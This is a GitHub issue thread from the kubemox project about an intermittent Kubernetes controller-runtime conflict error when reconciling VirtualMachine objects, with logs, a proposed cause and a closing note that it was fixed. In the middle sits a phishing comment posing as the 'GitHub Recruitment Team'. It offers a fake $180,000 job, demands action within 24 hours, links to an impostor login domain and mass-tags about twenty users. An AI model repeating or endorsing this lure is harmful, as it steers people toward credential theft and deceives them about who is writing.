### ISSUE TITLE
Reconciler error for VirtualMachine object

### ISSUE THREAD

**Issue by alperencelik** [alperencelik/kubemox#12]
By the default configuration on the repo for the VirtualMachineController settings 

```
	// Controller settings
	VMreconcilationPeriod     = 10
	VMmaxConcurrentReconciles = 10
```

I'm getting the error below sometimes:

```
2023-11-18T13:13:03+03:00       ERROR   Reconciler error        {"controller": "virtualmachine", "controllerGroup": "proxmox.alperen.cloud", "controllerKind": "VirtualMachine", "VirtualMachine": {"name":"kubernetes-worker-3","namespace":"default"}, "namespace": "default", "name": "kubernetes-worker-3", "reconcileID": "9f166e06-bd9b-4b73-82df-0ebbc0004db5", "error": "Operation cannot be fulfilled on virtualmachines.proxmox.alperen.cloud \"kubernetes-worker-3\": the object has been modified; please apply your changes to the latest version and try again"}
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).reconcileHandler
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:324
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).processNextWorkItem
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:265
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).Start.func2.2
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:226
2023-11-18T13:14:25+03:00       ERROR   Reconciler error        {"controller": "virtualmachine", "controllerGroup": "proxmox.alperen.cloud", "controllerKind": "VirtualMachine", "VirtualMachine": {"name":"kubernetes-worker-3","namespace":"default"}, "namespace": "default", "name": "kubernetes-worker-3", "reconcileID": "4fe5dd9c-c12c-4bd7-8210-20d791e77d41", "error": "Operation cannot be fulfilled on virtualmachines.proxmox.alperen.cloud \"kubernetes-worker-3\": the object has been modified; please apply your changes to the latest version and try again"}
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).reconcileHandler
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:324
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).processNextWorkItem
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:265
sigs.k8s.io/controller-runtime/pkg/internal/controller.(*Controller).Start.func2.2
        /Users/alperencelik/go/pkg/mod/sigs.k8s.io/controller-runtime@v0.15.0/pkg/internal/controller/controller.go:226
```

**Comment by alperencelik** [comment]
I think the object is modified for the Uptime field on Status so if one reconciler updates the status field and another one tries to get that object it errors as above.

```
	err := r.Get(ctx, req.NamespacedName, vm)
	if err != nil {
		// Log.Error(err, "unable to fetch VirtualMachine")
		return ctrl.Result{}, client.IgnoreNotFound(err)
	}
```


To eliminate that

`client.IgnoreStatusUpdates{}` can be used with `r.Get()`

**Comment by lupu2022** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
UditaSaxena, @Madhu-1, @wwmoraes, @hyschumi, @uhhc, @Broadroad, @micarlise, @QueryVS, @bwangelme, @ghostsquad, @prakharrr, @saintube, @And-ZJ, @zhangzhenhao, @walking-appa, @eikenb, @3m4r5, @BillDuke13, @kishoregv, @ihcsim

**Comment by alperencelik** [comment]
This has been fixed on #22.
